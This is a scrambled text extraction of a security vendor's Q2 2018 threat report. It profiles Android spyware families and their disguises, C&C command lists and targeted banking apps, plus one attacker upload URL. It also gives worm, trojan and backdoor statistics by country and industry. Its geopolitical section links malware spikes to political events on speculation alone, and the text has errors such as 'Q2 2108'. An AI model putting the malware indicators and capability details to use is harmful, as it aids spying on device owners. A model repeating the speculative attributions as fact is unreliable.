543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 26 of 73
4 Android Devices Under Siege
41 Spying Stealing Mining Android devices are rapidly becoming high-value targets for cybercriminals and malware authors It is not surprising because today almost any smartphone is a treasure trove of information for perpetrators People increasingly use smartphones for financial operations but those are not the only jackpot for attackers Today every smartphone contains a plethora of confidential information about its owner
If the victim is a CEO politician or other VIP the content of the mobile device can be sold at the highest prices Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims Of course not only cybercriminals hunt for smartphone content Intelligence agencies and business competitors want to know everything about their targets Add jealous spouses tracking every move of their partners and parents wanting to control their children and you will easily understand why Android-oriented malware is a growing business
Today spying is the number one purpose of the Android malware In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them You can see the whole family of these digital spooks on the graph
The digital spooks
Global Threat Report Q2 2018 Edition
Page 27 of 73
Like real-world spies digital agents impersonate legitimate entities pretending to innocent applications or hiding malicious code inside legitimate software Like real spies they seek to remain invisible and constantly change disguises to avoid detection and hone their tradecraft from version to version
411 KevDroid The first is named KevDroid Itrsquos distributed in three versions
Version-1 Naver Defender
Version-2 Netease Defender
Version-3
PU
Disguises of KevDroid
The first version disguised as the Naver Defender application covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection This sample has multifunctional abilities for spying It steals account details contacts id name phone numbers and email address of the owner It grabs SMS messages and associated info It attempts to read call logs (number name type duration) emails (email type) and photos of the contacts After extracting all the data the malware encrypts it with ldquoAESrdquo algorithm and send to the attackersrsquo server httphttpcgalimcomadminhrpupuphpdo=upload
KevDroid records the victimrsquos every phone call then encrypts and uploads it to the cybercriminalsrsquo server In addition it collects information about currently running services installed apps and the launcher name
The second version Netease Defender has additional spying abilities It takes control over the device camera and covertly records the victimrsquos activity Then it sends the video to the attackersrsquo server
Version-3 of KevDroid makes photos records call and creates a list of files on the device Also it extracts the web history account and contact details and the device information
People assume they are safe if they download apps exclusively from the official Google Play store This wrong assumption can be costly the first version of Desert Scorpion spyware was spread via official Google Play Services The spyware was camouflaged as a chat called Dardesh Instant App But when a user downloaded and ran it the app covertly connected to
Global Threat Report Q2 2018 Edition
Page 28 of 73
cybercriminalsrsquo Command and Control server and downloaded the spyware on the device From that moment the spyware constantly kept track of all events on the infected device Another means of the malware dissemination was social networks
Version-1 Dardesh Google Play Services Instant Apps
Version-2 Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls audios and videos uninstalls other apps sends and receives messages and tracks the location of the smartphone It is included in some spyware tools like FinSpy and Pegasus Beyond the capabilities of the first version it collects information about installed applications extracts the metadata and makes changes on the victim device
Global Threat Report Q2 2018 Edition
Page 29 of 73
412 Zoo Park The next member of the spy family Zoo Park has 4 different versions
Version-1 Telegram Groups انتخاب دھم
Version-2 Postrall Yes For Referendum انتخاب دھم
Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
Version-4 VPN Easy DroFirewall m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app It extracts Accounts and Contacts details encodes them with Base64 and sends to the attackers server The second version has additional abilities extracting SMS details device information (including IMEI Network Operator Name SDK version OS version etc) Call Log details and External Storage content
The third version is included in spyware named ldquoSpymaster Prordquo and can
Enable and disable the GPS services
Record audio and send it to Command amp Control server
Upload image files
Collect information about the application installed
Collect browserrsquos data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy DroFirewall etc
Global Threat Report Q2 2018 Edition
Page 30 of 73
In addition to the abilities of previous versions it includes some additional tricks
Extracts photos audios and videos
Records screen
Executes shell commands
Records calls
413 MikeSpy Some spyware examples specifically hunt for messengerrsquos data Like the next digital spook MikeSpy
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflaged itself as a Virtual Girlfriend application But instead of girlfriend it has a bundle of malicious abilities
Takes control over Bluetooth Adapter
Extracts data about accounts contacts details installed apps
Extracts data from the WhatsApp Message DB and related keys
Uploads collected data to the cybercriminalsrsquo server via FTP
414 Xloader The next spyware Xloader combines spying with purposeful hunting for banking applications on the device It has trust-inspired cover icons imitating Facebook and Google Chrome
Version-1 to Version-3 FaceBook Chrome
Disguises of Xloader
Global Threat Report Q2 2018 Edition
Page 31 of 73
After infection Xloader connects to its CampC server and executes the following commands
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the next banking applications presence comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbsrdquo
Extract contacts details
Set Wi-Fi always turned on
Version 2 can execute additional commands
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access to a location specified by attackers
Make records
Make calls
415 Stalker Spy The next malware in the raw is Stalker Spy As you can see its a champion in the number of masks it puts on to deceive users
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Global Threat Report Q2 2018 Edition
Page 32 of 73
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to usual must-have spyware set Xloader can turn on microphone remotely on the infected device to make recordings This malware is used in three known applications FlexiSpy HelloSpy MobiSpy
416 Mystery Bot The next malware is much more than a spy The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to CampC server of Locky bot The second version Mystery Bot is ransomware that encrypts files on external storage After encryption the malware deletes original files So we can call it a spy with an OO7 licenserdquo
Version 1 Adobe Flash Player
Version2 Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player Below is the list of some commands that the malware can execute on your device
Global Threat Report Q2 2018 Edition
Page 33 of 73
Send_SMS mdash extract SMS content and set it to CampC server
Send_USSD mdash send the USSD to CampC server
Gethistory mdash monitor browser history
Start_AllApp mdash gather info about installed applications
Send_call mdash set the Intent action to call
Forward_call mdash forward incoming calls
ResForward_call mdash reset the forward calls
Go_Smsmnd mdash delete SMS content
Go_GetAlls mdashget SMS History
Dell_sms mdash delete SMS content in a conversation
Send_spam mdash send spam SMS
Start_Inject mdash call injectors class
417 FakeSpy FakeSpy also has many masks that you can see in the screenshot
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends to CampC servers Also it checks for the next banking applications aucomapp softbankcomapp docomocomapp
Here are some commands from its Command and Control server
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
Global Threat Report Q2 2018 Edition
Page 34 of 73
418 RedAlert RedAlert changes multiple ldquospy legendsrdquo to get users trust It wears masks of popular application to deceive its victims Update Flash Player Viber WhatsApp Update WhatsApp Ebook Reader
Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber
Version_2 Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums Its distinguishing feature is the ability to block incoming calls from banks It canvasses the device in search of the following bank applications
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites including Google Chrome Google Play store Gmail and YouTube
419 Hero Rat The next digital spook Hero Rat mostly acts on the Iran territory It uses third-party play stores social networks and messengers for spreading
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
Global Threat Report Q2 2018 Edition
Page 35 of 73
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on the Telegram hacking channel Noticeably that itrsquos sold in three options bronze silver and gold
After infiltration into a victimrsquos device Hero Rat shows a warning like app canrsquot be runrdquo But it runs in the background and starts the spying activity It steals text messages audio records makes calls detect device location etc The newly infected device is controlled via Telegram bot functionality
Hero Rat disguises as Bitcoin Free Internet Connection Get free Followers and Telegram versions for Iranian market
4110 Sonvpay The next malware Sonvpay also wears many masks but it is more of a fraudster than a spy
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Global Threat Report Q2 2018 Edition
Page 36 of 73
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the ownerrsquos mobile billing Once installed this malware displays fake notification ldquoskip optionrdquo If you click this button this malware begins to work in the background subscribing the user to services she did not order
It comes to victims in a variety of disguises named below
4111 CoinHive And the last one in our Q2 Android malware list is CoinHive We already mentioned it earlier in the report and here is the version for Android devices CoinHive for Android comes in three versions every of them updates its mining potential It is disseminated via counterfeit apps you see below But one of the vectors is especially interesting
Version-1 Netflix Hack Instagram Hack
Version-2 TSF Launcher
Version-3 Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via hellip another cryptominer named CoinMiner
How is it possible Letrsquos imagine a cybercriminal who wants to infect its victims with a cryptominer to utilize their recourses for cryptocurrency mining She chooses CoinMiner for that purpose downloads it and implants into the victimsrsquo machines However she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive So the first attacker is a victim Thief robbing thief
This story clearly illustrates the situation in cybersecurity in Q2 No one can feel totally secure Even a predator can turn prey in seconds
Global Threat Report Q2 2018 Edition
Page 37 of 73
42 Android Malware Catalogued by Month Below you will find detailed statistics on Android-targeted malware by months
421 April 2018
Android-targeted malware on April
422 May 2018
Android targeted malware on May
020000400006000080000
100000120000140000160000180000
050000
100000150000200000250000300000350000400000450000500000
Global Threat Report Q2 2018 Edition
Page 38 of 73
423 June 2018
Android-targeted malware on June
0
50000
100000
150000
200000
250000
300000
Global Threat Report Q2 2018 Edition
Page 39 of 73
5 Malware in Q2 2018 The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
